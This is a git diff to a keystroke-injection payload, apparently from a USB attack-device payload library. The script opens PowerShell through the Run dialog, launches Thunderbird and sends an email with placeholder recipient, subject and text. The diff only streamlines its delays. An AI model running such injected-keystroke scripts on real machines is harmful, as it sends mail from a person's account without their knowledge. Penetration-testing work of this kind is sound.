diff --git a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt index c2dd218..877848a 100644 --- a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt +++ b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt @@ -27,14 +27,11 @@ DEFINE SUBJECT example REM REQUIRED - Set email message DEFINE MESSAGE example - +DEFAULT_DELAY 1000 REM # PowerShell -DELAY 1000 GUI r -DELAY 1000 STRING powershell ENTER -DELAY 2000 STRINGLN Start-Process "thunderbird.exe" DELAY 4000 @@ -42,23 +39,14 @@ REM # Thunderbird CTRL n DELAY 2000 STRING EMAIL-ADDRESS -DELAY 500 -TAB -DELAY 500 -TAB -DELAY 500 +REPEAT 2 TAB STRING SUBJECT -DELAY 500 TAB -DELAY 500 STRING MESSAGE -DELAY 500 CTRL ENTER DELAY 2000 ENTER REM # End actions -DELAY 2000 ALT F4 -DELAY 1000 ALT F4